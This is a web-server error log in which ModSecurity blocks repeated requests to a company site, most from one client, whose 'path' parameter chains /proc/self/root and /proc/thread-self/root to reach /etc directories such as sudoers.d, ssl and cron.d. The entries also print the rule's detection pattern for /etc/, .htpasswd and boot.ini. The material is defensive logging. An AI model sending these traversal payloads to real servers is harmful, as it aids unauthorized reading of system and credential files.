[Tue Mar 17 20:55:53.330420 2026] [:error] [pid 25836:tid 140411540502272] [client 74.7.241.31:59338] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqCYh-PF_25v4hFRCRowAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:55:55.729527 2026] [:error] [pid 29151:tid 140411607643904] [client 74.7.241.31:59346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqCvPqhzTj3BvfDX-vjgAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:08.125231 2026] [proxy_fcgi:error] [pid 31803:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47522] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:56:11.165858 2026] [:error] [pid 2598:tid 140411607643904] [client 74.7.241.31:35100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqGhj0p0SRWAqcjGGgnQAAAxA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:12.474282 2026] [:error] [pid 25836:tid 140411607643904] [client 74.7.241.31:35108] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqHIh-PF_25v4hFRCRqgAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:13.987952 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.241.31:35116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqHew_le52K8_3pV1ziQAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:15.419010 2026] [:error] [pid 11088:tid 140411590858496] [client 74.7.241.31:35120] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqH2mqtCojLHvu5cKPvwAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:28.661304 2026] [:error] [pid 11088:tid 140411699963648] [client 216.73.216.191:3949] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqLGmqtCojLHvu5cKPxAAAAIU"]
[Tue Mar 17 20:56:30.078399 2026] [proxy_fcgi:error] [pid 2598:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47852] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:56:31.377649 2026] [:error] [pid 25836:tid 140411540502272] [client 74.7.241.31:35126] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqL4h-PF_25v4hFRCRrgAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:37.725404 2026] [:error] [pid 25836:tid 140411649607424] [client 74.7.241.31:42218] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqNYh-PF_25v4hFRCRsQAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:39.111829 2026] [:error] [pid 29151:tid 140411649607424] [client 74.7.241.31:56674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqN_PqhzTj3BvfDX-vnwAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:40.445491 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:56676] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqOOyqAr6etmhZHNpNoAAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:42.199037 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.241.31:56690] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqOuyqAr6etmhZHNpNowAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:43.635079 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.241.31:56698] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqO-w_le52K8_3pV1zkwAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:45.083264 2026] [:error] [pid 6296:tid 140411599251200] [client 74.7.241.31:56714] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqPXIk7brgkOH-rIWzRAAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:46.627061 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.241.31:56718] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqPuyqAr6etmhZHNpNqQAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:48.112847 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:58772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqQMdf6f5d65gmYZRjWAAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:49.575070 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.241.31:58780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqQew_le52K8_3pV1znAAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:51.083862 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.241.31:58782] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqQ3Ik7brgkOH-rIWzRgAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:52.080976 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:48274] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:56:52.532118 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.241.31:58794] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqROw_le52K8_3pV1znQAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:55.242282 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.241.31:58802] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqR-w_le52K8_3pV1zoQAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:56:55.996375 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:39052] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqR9a6ubjKNq_cu4YtgAAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:56:56.849514 2026] [:error] [pid 29151:tid 140411540502272] [client 74.7.241.31:58814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnqSPPqhzTj3BvfDX-vowAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
